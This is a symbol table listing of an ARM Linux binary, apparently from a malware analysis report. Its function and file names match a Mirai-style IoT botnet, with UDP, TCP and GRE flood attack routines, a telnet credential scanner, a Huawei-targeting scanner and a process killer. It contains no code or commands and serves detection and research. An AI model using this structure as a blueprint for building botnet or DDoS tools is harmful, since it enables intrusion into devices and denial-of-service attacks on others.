bind	.dynsym	0x8c38	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
calloc	.dynsym	0x8c14	320	FUNC	<unknown>	DEFAULT	SHN_UNDEF
chdir	.dynsym	0x8c50	56	FUNC	<unknown>	DEFAULT	SHN_UNDEF
clock	.dynsym	0x8d34	52	FUNC	<unknown>	DEFAULT	SHN_UNDEF
close	.dynsym	0x8d64	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
closedir	.dynsym	0x8d4c	272	FUNC	<unknown>	DEFAULT	SHN_UNDEF
connect	.dynsym	0x8b48	116	FUNC	<unknown>	DEFAULT	SHN_UNDEF
exit	.dynsym	0x8d1c	196	FUNC	<unknown>	DEFAULT	SHN_UNDEF
fcntl	.dynsym	0x8d58	244	FUNC	<unknown>	DEFAULT	SHN_UNDEF
fork	.dynsym	0x8cb0	972	FUNC	<unknown>	DEFAULT	SHN_UNDEF
free	.dynsym	0x8d7c	572	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getpid	.dynsym	0x8b6c	72	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getppid	.dynsym	0x8ce0	20	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getsockname	.dynsym	0x8d94	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getsockopt	.dynsym	0x8d04	72	FUNC	<unknown>	DEFAULT	SHN_UNDEF
inet_addr	.dynsym	0x8c44	40	FUNC	<unknown>	DEFAULT	SHN_UNDEF
ioctl	.dynsym	0x8b30	224	FUNC	<unknown>	DEFAULT	SHN_UNDEF
kill	.dynsym	0x8c2c	56	FUNC	<unknown>	DEFAULT	SHN_UNDEF
listen	.dynsym	0x8ca4	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
lseek	.dynsym	0x0	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
malloc	.dynsym	0x8b9c	2360	FUNC	<unknown>	DEFAULT	SHN_UNDEF
memcpy	.dynsym	0x8b84	4	FUNC	<unknown>	DEFAULT	SHN_UNDEF
memmove	.dynsym	0x8b60	4	FUNC	<unknown>	DEFAULT	SHN_UNDEF
memset	.dynsym	0x8cc8	156	FUNC	<unknown>	DEFAULT	SHN_UNDEF
open	.dynsym	0x8d28	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
opendir	.dynsym	0x8cf8	196	FUNC	<unknown>	DEFAULT	SHN_UNDEF
prctl	.dynsym	0x8b78	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
raise	.dynsym	0x8d70	240	FUNC	<unknown>	DEFAULT	SHN_UNDEF
rand	.dynsym	0x8c68	24	FUNC	<unknown>	DEFAULT	SHN_UNDEF
read	.dynsym	0x8c80	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
readdir	.dynsym	0x8bd8	232	FUNC	<unknown>	DEFAULT	SHN_UNDEF
readlink	.dynsym	0x8b90	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
realloc	.dynsym	0x8c98	960	FUNC	<unknown>	DEFAULT	SHN_UNDEF
recv	.dynsym	0x8b3c	112	FUNC	<unknown>	DEFAULT	SHN_UNDEF
recvfrom	.dynsym	0x8bb4	136	FUNC	<unknown>	DEFAULT	SHN_UNDEF
rewinddir	.dynsym	0x0	168	FUNC	<unknown>	DEFAULT	SHN_UNDEF
select	.dynsym	0x8bcc	132	FUNC	<unknown>	DEFAULT	SHN_UNDEF
send	.dynsym	0x8bf0	112	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sendto	.dynsym	0x8c8c	136	FUNC	<unknown>	DEFAULT	SHN_UNDEF
setsid	.dynsym	0x8d40	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
setsockopt	.dynsym	0x8c5c	72	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sigaddset	.dynsym	0x8be4	80	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sigemptyset	.dynsym	0x8b54	20	FUNC	<unknown>	DEFAULT	SHN_UNDEF
signal	.dynsym	0x8c74	196	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sigprocmask	.dynsym	0x8d88	140	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sleep	.dynsym	0x8ba8	272	FUNC	<unknown>	DEFAULT	SHN_UNDEF
socket	.dynsym	0x8bc0	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
srand	.dynsym	0x8cd4	164	FUNC	<unknown>	DEFAULT	SHN_UNDEF
time	.dynsym	0x8cec	48	FUNC	<unknown>	DEFAULT	SHN_UNDEF
usleep	.dynsym	0x0	80	FUNC	<unknown>	DEFAULT	SHN_UNDEF
write	.dynsym	0x8c20	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
	.symtab	0x80f4	0	SECTION	<unknown>	DEFAULT	1
	.symtab	0x8108	0	SECTION	<unknown>	DEFAULT	2
	.symtab	0x832c	0	SECTION	<unknown>	DEFAULT	3
	.symtab	0x876c	0	SECTION	<unknown>	DEFAULT	4
	.symtab	0x896c	0	SECTION	<unknown>	DEFAULT	5
	.symtab	0x8b0c	0	SECTION	<unknown>	DEFAULT	6
	.symtab	0x8b1c	0	SECTION	<unknown>	DEFAULT	7
	.symtab	0x8da0	0	SECTION	<unknown>	DEFAULT	8
	.symtab	0x11454	0	SECTION	<unknown>	DEFAULT	9
	.symtab	0x11464	0	SECTION	<unknown>	DEFAULT	10
	.symtab	0x19a08	0	SECTION	<unknown>	DEFAULT	11
	.symtab	0x19a0c	0	SECTION	<unknown>	DEFAULT	12
	.symtab	0x19a10	0	SECTION	<unknown>	DEFAULT	13
	.symtab	0x19a14	0	SECTION	<unknown>	DEFAULT	14
	.symtab	0x19a18	0	SECTION	<unknown>	DEFAULT	15
	.symtab	0x19ad0	0	SECTION	<unknown>	DEFAULT	16
	.symtab	0x19bac	0	SECTION	<unknown>	DEFAULT	17
	.symtab	0x19c0c	0	SECTION	<unknown>	DEFAULT	18
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	19
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	20
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	21
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	22
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	23
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
	.symtab	0x0	0	SECTION	<unknown>	DEFAULT	25
$a	.symtab	0x8b0c	0	NOTYPE	<unknown>	DEFAULT	6
$a	.symtab	0x11454	0	NOTYPE	<unknown>	DEFAULT	9
$a	.symtab	0x8b18	0	NOTYPE	<unknown>	DEFAULT	6
$a	.symtab	0x11460	0	NOTYPE	<unknown>	DEFAULT	9
$a	.symtab	0x8da0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x8dbc	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x8df8	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x8e34	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x8f30	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x9088	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x92a4	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x9310	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x9380	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x9714	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x9da8	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xa3c4	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xa664	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xae18	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xb510	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xbbbc	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xbf18	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xc144	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xc3e4	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xc81c	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xcd08	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xcd58	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xcdfc	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xced0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xd9e8	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xdb4c	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xe2c8	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xe338	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xe3a4	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xe434	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xe568	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xe590	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xea98	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xeb60	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xecc0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xf82c	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0xfd54	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x104cc	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x104f0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x105a0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10650	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x108b0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10e18	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10e40	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10e78	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10ec0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10ee4	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10f08	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10f74	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x10fd0	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x11064	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x110f4	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x11230	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x1132c	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x11440	0	NOTYPE	<unknown>	DEFAULT	8
$a	.symtab	0x8b1c	0	NOTYPE	<unknown>	DEFAULT	7
$a	.symtab	0x8b30	0	NOTYPE	<unknown>	DEFAULT	7
$d	.symtab	0x8db8	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x19a10	0	NOTYPE	<unknown>	DEFAULT	13
$d	.symtab	0x8df0	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x19a0c	0	NOTYPE	<unknown>	DEFAULT	12
$d	.symtab	0x19bac	0	NOTYPE	<unknown>	DEFAULT	17
$d	.symtab	0x8e28	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x8f28	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x9084	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x96e0	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x9da4	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xa3c0	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xae14	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xb50c	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xbbb8	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xc818	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xcd04	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xcecc	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xd9c4	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xdb40	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xe290	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x19bb0	0	NOTYPE	<unknown>	DEFAULT	17
$d	.symtab	0x19bb4	0	NOTYPE	<unknown>	DEFAULT	17
$d	.symtab	0x19bb8	0	NOTYPE	<unknown>	DEFAULT	17
$d	.symtab	0xe328	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xe394	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xe424	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xe558	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xeb5c	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xecb4	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xf808	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0xfc88	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x1191c	0	NOTYPE	<unknown>	DEFAULT	10
$d	.symtab	0x11925	0	NOTYPE	<unknown>	DEFAULT	10
$d	.symtab	0x104ec	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x10598	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x10648	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x10874	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x19bbc	0	NOTYPE	<unknown>	DEFAULT	17
$d	.symtab	0x10e10	0	NOTYPE	<unknown>	DEFAULT	8
$d	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	24
$d	.symtab	0x20	0	NOTYPE	<unknown>	DEFAULT	24
$d	.symtab	0x26	0	NOTYPE	<unknown>	DEFAULT	24
$d	.symtab	0x8b2c	0	NOTYPE	<unknown>	DEFAULT	7
C.42.5028	.symtab	0x11925	3	OBJECT	<unknown>	DEFAULT	10
C.43.5029	.symtab	0x1191c	9	OBJECT	<unknown>	DEFAULT	10
LOCAL_ADDR	.symtab	0x19cb8	4	OBJECT	<unknown>	DEFAULT	18
_DYNAMIC	.symtab	0x19a18	0	OBJECT	<unknown>	HIDDEN	15
_GLOBAL_OFFSET_TABLE_	.symtab	0x19ad0	0	OBJECT	<unknown>	HIDDEN	16
_Jv_RegisterClasses	.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
__FRAME_END__	.symtab	0x19a08	0	OBJECT	<unknown>	DEFAULT	11
__JCR_END__	.symtab	0x19a14	0	OBJECT	<unknown>	DEFAULT	14
__JCR_LIST__	.symtab	0x19a14	0	OBJECT	<unknown>	DEFAULT	14
__aeabi_uidiv	.symtab	0x1132c	0	FUNC	<unknown>	HIDDEN	8
__aeabi_uidivmod	.symtab	0x11428	24	FUNC	<unknown>	HIDDEN	8
__bss_end__	.symtab	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start	.symtab	0x19c0c	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__bss_start__	.symtab	0x19c0c	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__data_start	.symtab	0x19bac	0	NOTYPE	<unknown>	DEFAULT	17
__div0	.symtab	0x11440	20	FUNC	<unknown>	HIDDEN	8
__do_global_dtors_aux	.symtab	0x8da0	0	FUNC	<unknown>	DEFAULT	8
__do_global_dtors_aux_fini_array_entry	.symtab	0x19a10	0	OBJECT	<unknown>	DEFAULT	13
__end__	.symtab	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__errno_location	.symtab	0x8d10	32	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__exidx_end	.symtab	0x11a08	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__exidx_start	.symtab	0x11a08	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
__frame_dummy_init_array_entry	.symtab	0x19a0c	0	OBJECT	<unknown>	DEFAULT	12
__uClibc_main	.symtab	0x8cbc	848	FUNC	<unknown>	DEFAULT	SHN_UNDEF
__udivsi3	.symtab	0x1132c	252	FUNC	<unknown>	HIDDEN	8
_bss_end__	.symtab	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_edata	.symtab	0x19c0c	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_end	.symtab	0x19d64	0	NOTYPE	<unknown>	DEFAULT	SHN_ABS
_fini	.symtab	0x11454	0	FUNC	<unknown>	DEFAULT	9
_init	.symtab	0x8b0c	0	FUNC	<unknown>	DEFAULT	6
_start	.symtab	0x8df8	80	FUNC	<unknown>	DEFAULT	8
abort	.symtab	0x8bfc	296	FUNC	<unknown>	DEFAULT	SHN_UNDEF
accept	.symtab	0x8c08	116	FUNC	<unknown>	DEFAULT	SHN_UNDEF
add_auth_entry	.symtab	0xeb60	352	FUNC	<unknown>	DEFAULT	8
atoi	.symtab	0x0	32	FUNC	<unknown>	DEFAULT	SHN_UNDEF
attack.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_get_opt_int	.symtab	0x9310	112	FUNC	<unknown>	DEFAULT	8
attack_get_opt_ip	.symtab	0x92a4	108	FUNC	<unknown>	DEFAULT	8
attack_gre.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_gre_eth	.symtab	0x9714	1684	FUNC	<unknown>	DEFAULT	8
attack_gre_ip	.symtab	0x9da8	1564	FUNC	<unknown>	DEFAULT	8
attack_init	.symtab	0x9380	916	FUNC	<unknown>	DEFAULT	8
attack_kill_all	.symtab	0x8f30	344	FUNC	<unknown>	DEFAULT	8
attack_ongoing	.symtab	0x19c14	32	OBJECT	<unknown>	DEFAULT	18
attack_parse	.symtab	0x9088	540	FUNC	<unknown>	DEFAULT	8
attack_start	.symtab	0x8e34	252	FUNC	<unknown>	DEFAULT	8
attack_std	.symtab	0xa3c4	672	FUNC	<unknown>	DEFAULT	8
attack_std.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_tcp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_tcp_ack	.symtab	0xae18	1784	FUNC	<unknown>	DEFAULT	8
attack_tcp_bypass	.symtab	0xbbbc	860	FUNC	<unknown>	DEFAULT	8
attack_tcp_stomp	.symtab	0xa664	1972	FUNC	<unknown>	DEFAULT	8
attack_tcp_syn	.symtab	0xb510	1708	FUNC	<unknown>	DEFAULT	8
attack_udp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
attack_udp_bypass	.symtab	0xbf18	556	FUNC	<unknown>	DEFAULT	8
attack_udp_generic	.symtab	0xc81c	1260	FUNC	<unknown>	DEFAULT	8
attack_udp_plain	.symtab	0xc144	672	FUNC	<unknown>	DEFAULT	8
attack_udp_vse	.symtab	0xc3e4	1080	FUNC	<unknown>	DEFAULT	8
auth_table	.symtab	0x19cac	4	OBJECT	<unknown>	DEFAULT	18
auth_table_len	.symtab	0x19c80	4	OBJECT	<unknown>	DEFAULT	18
auth_table_max_weight	.symtab	0x19cb0	2	OBJECT	<unknown>	DEFAULT	18
bind	.symtab	0x8c38	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
calloc	.symtab	0x8c14	320	FUNC	<unknown>	DEFAULT	SHN_UNDEF
chdir	.symtab	0x8c50	56	FUNC	<unknown>	DEFAULT	SHN_UNDEF
checksum.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
checksum_generic	.symtab	0xcd08	80	FUNC	<unknown>	DEFAULT	8
checksum_tcpudp	.symtab	0xcd58	164	FUNC	<unknown>	DEFAULT	8
clock	.symtab	0x8d34	52	FUNC	<unknown>	DEFAULT	SHN_UNDEF
close	.symtab	0x8d64	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
closedir	.symtab	0x8d4c	272	FUNC	<unknown>	DEFAULT	SHN_UNDEF
completed.5458	.symtab	0x19c0c	1	OBJECT	<unknown>	DEFAULT	18
conn_table	.symtab	0x19c68	4	OBJECT	<unknown>	DEFAULT	18
conn_table	.symtab	0x19ccc	4	OBJECT	<unknown>	DEFAULT	18
connect	.symtab	0x8b48	116	FUNC	<unknown>	DEFAULT	SHN_UNDEF
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
crtstuff.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
data_start	.symtab	0x19bac	0	NOTYPE	<unknown>	DEFAULT	17
ensure_single_instance	.symtab	0xd9e8	356	FUNC	<unknown>	DEFAULT	8
exit	.symtab	0x8d1c	196	FUNC	<unknown>	DEFAULT	SHN_UNDEF
fake_time	.symtab	0x19cb4	4	OBJECT	<unknown>	DEFAULT	18
fcntl	.symtab	0x8d58	244	FUNC	<unknown>	DEFAULT	SHN_UNDEF
fd_ctrl	.symtab	0x19bb0	4	OBJECT	<unknown>	DEFAULT	17
fd_serv	.symtab	0x19bb4	4	OBJECT	<unknown>	DEFAULT	17
fork	.symtab	0x8cb0	972	FUNC	<unknown>	DEFAULT	SHN_UNDEF
frame_dummy	.symtab	0x8dbc	0	FUNC	<unknown>	DEFAULT	8
free	.symtab	0x8d7c	572	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getpid	.symtab	0x8b6c	72	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getppid	.symtab	0x8ce0	20	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getsockname	.symtab	0x8d94	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
getsockopt	.symtab	0x8d04	72	FUNC	<unknown>	DEFAULT	SHN_UNDEF
huawei.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
huawei_fake_time	.symtab	0x19c64	4	OBJECT	<unknown>	DEFAULT	18
huawei_init	.symtab	0xced0	2840	FUNC	<unknown>	DEFAULT	8
huawei_rsck	.symtab	0x19c38	4	OBJECT	<unknown>	DEFAULT	18
huawei_scanner_pid	.symtab	0x19c34	4	OBJECT	<unknown>	DEFAULT	18
huawei_scanner_rawpkt	.symtab	0x19c3c	40	OBJECT	<unknown>	DEFAULT	18
huawei_setup_connection	.symtab	0xcdfc	212	FUNC	<unknown>	DEFAULT	8
inet_addr	.symtab	0x8c44	40	FUNC	<unknown>	DEFAULT	SHN_UNDEF
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
initfini.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
ioctl	.symtab	0x8b30	224	FUNC	<unknown>	DEFAULT	SHN_UNDEF
kill	.symtab	0x8c2c	56	FUNC	<unknown>	DEFAULT	SHN_UNDEF
killer.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer_kill_by_port	.symtab	0x108b0	1384	FUNC	<unknown>	DEFAULT	8
listen	.symtab	0x8ca4	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
local_bind.4753	.symtab	0x19bb8	1	OBJECT	<unknown>	DEFAULT	17
lseek	.symtab	0x0	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
main	.symtab	0xdb4c	1916	FUNC	<unknown>	DEFAULT	8
main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
malloc	.symtab	0x8b9c	2360	FUNC	<unknown>	DEFAULT	SHN_UNDEF
memcpy	.symtab	0x8b84	4	FUNC	<unknown>	DEFAULT	SHN_UNDEF
memmove	.symtab	0x8b60	4	FUNC	<unknown>	DEFAULT	SHN_UNDEF
memset	.symtab	0x8cc8	156	FUNC	<unknown>	DEFAULT	SHN_UNDEF
methods	.symtab	0x19c10	4	OBJECT	<unknown>	DEFAULT	18
methods_len	.symtab	0x19c0d	1	OBJECT	<unknown>	DEFAULT	18
open	.symtab	0x8d28	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
opendir	.symtab	0x8cf8	196	FUNC	<unknown>	DEFAULT	SHN_UNDEF
pending_connection	.symtab	0x19c6c	1	OBJECT	<unknown>	DEFAULT	18
prctl	.symtab	0x8b78	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
raise	.symtab	0x8d70	240	FUNC	<unknown>	DEFAULT	SHN_UNDEF
rand	.symtab	0x8c68	24	FUNC	<unknown>	DEFAULT	SHN_UNDEF
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand_init	.symtab	0xe338	108	FUNC	<unknown>	DEFAULT	8
rand_next	.symtab	0xe2c8	112	FUNC	<unknown>	DEFAULT	8
rand_next_range	.symtab	0xe3a4	144	FUNC	<unknown>	DEFAULT	8
rand_str	.symtab	0xe434	308	FUNC	<unknown>	DEFAULT	8
read	.symtab	0x8c80	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
readdir	.symtab	0x8bd8	232	FUNC	<unknown>	DEFAULT	SHN_UNDEF
readlink	.symtab	0x8b90	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
realloc	.symtab	0x8c98	960	FUNC	<unknown>	DEFAULT	SHN_UNDEF
recv	.symtab	0x8b3c	112	FUNC	<unknown>	DEFAULT	SHN_UNDEF
recvfrom	.symtab	0x8bb4	136	FUNC	<unknown>	DEFAULT	SHN_UNDEF
resolv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv_entries_free	.symtab	0xe568	40	FUNC	<unknown>	DEFAULT	8
resolv_lookup	.symtab	0xe590	1288	FUNC	<unknown>	DEFAULT	8
rewinddir	.symtab	0x0	168	FUNC	<unknown>	DEFAULT	SHN_UNDEF
rsck	.symtab	0x19cd0	4	OBJECT	<unknown>	DEFAULT	18
rsck_out	.symtab	0x19cd8	4	OBJECT	<unknown>	DEFAULT	18
scanner.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
scanner_init	.symtab	0xecc0	6156	FUNC	<unknown>	DEFAULT	8
scanner_pid	.symtab	0x19cd4	4	OBJECT	<unknown>	DEFAULT	18
scanner_rawpkt	.symtab	0x19c84	40	OBJECT	<unknown>	DEFAULT	18
select	.symtab	0x8bcc	132	FUNC	<unknown>	DEFAULT	SHN_UNDEF
send	.symtab	0x8bf0	112	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sendto	.symtab	0x8c8c	136	FUNC	<unknown>	DEFAULT	SHN_UNDEF
setsid	.symtab	0x8d40	64	FUNC	<unknown>	DEFAULT	SHN_UNDEF
setsockopt	.symtab	0x8c5c	72	FUNC	<unknown>	DEFAULT	SHN_UNDEF
setup_connection	.symtab	0xea98	200	FUNC	<unknown>	DEFAULT	8
sigaddset	.symtab	0x8be4	80	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sigemptyset	.symtab	0x8b54	20	FUNC	<unknown>	DEFAULT	SHN_UNDEF
signal	.symtab	0x8c74	196	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sigprocmask	.symtab	0x8d88	140	FUNC	<unknown>	DEFAULT	SHN_UNDEF
sleep	.symtab	0x8ba8	272	FUNC	<unknown>	DEFAULT	SHN_UNDEF
socket	.symtab	0x8bc0	68	FUNC	<unknown>	DEFAULT	SHN_UNDEF
srand	.symtab	0x8cd4	164	FUNC	<unknown>	DEFAULT	SHN_UNDEF
srv_addr	.symtab	0x19cbc	16	OBJECT	<unknown>	DEFAULT	18
table	.symtab	0x19cdc	136	OBJECT	<unknown>	DEFAULT	18
table.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table_init	.symtab	0x10650	608	FUNC	<unknown>	DEFAULT	8
table_keys	.symtab	0x19bbc	80	OBJECT	<unknown>	DEFAULT	17
table_lock_val	.symtab	0x104f0	176	FUNC	<unknown>	DEFAULT	8
table_retrieve_val	.symtab	0x104cc	36	FUNC	<unknown>	DEFAULT	8
table_unlock_val	.symtab	0x105a0	176	FUNC	<unknown>	DEFAULT	8
tcp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
time	.symtab	0x8cec	48	FUNC	<unknown>	DEFAULT	SHN_UNDEF
usleep	.symtab	0x0	80	FUNC	<unknown>	DEFAULT	SHN_UNDEF
util.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
util_atoi	.symtab	0x110f4	316	FUNC	<unknown>	DEFAULT	8
util_fdgets	.symtab	0x10f74	92	FUNC	<unknown>	DEFAULT	8
util_itoa	.symtab	0x11230	252	FUNC	<unknown>	DEFAULT	8
util_local_addr	.symtab	0x10fd0	148	FUNC	<unknown>	DEFAULT	8
util_memcpy	.symtab	0x10ec0	36	FUNC	<unknown>	DEFAULT	8
util_memsearch	.symtab	0x10f08	108	FUNC	<unknown>	DEFAULT	8
util_strcat	.symtab	0x10e40	56	FUNC	<unknown>	DEFAULT	8
util_strcpy	.symtab	0x10e78	72	FUNC	<unknown>	DEFAULT	8
util_stristr	.symtab	0x11064	144	FUNC	<unknown>	DEFAULT	8
util_strlen	.symtab	0x10e18	40	FUNC	<unknown>	DEFAULT	8
util_zero	.symtab	0x10ee4	36	FUNC	<unknown>	DEFAULT	8
w	.symtab	0x19c7c	4	OBJECT	<unknown>	DEFAULT	18
write	.symtab	0x8c20	100	FUNC	<unknown>	DEFAULT	SHN_UNDEF
x	.symtab	0x19c70	4	OBJECT	<unknown>	DEFAULT	18
y	.symtab	0x19c74	4	OBJECT	<unknown>	DEFAULT	18
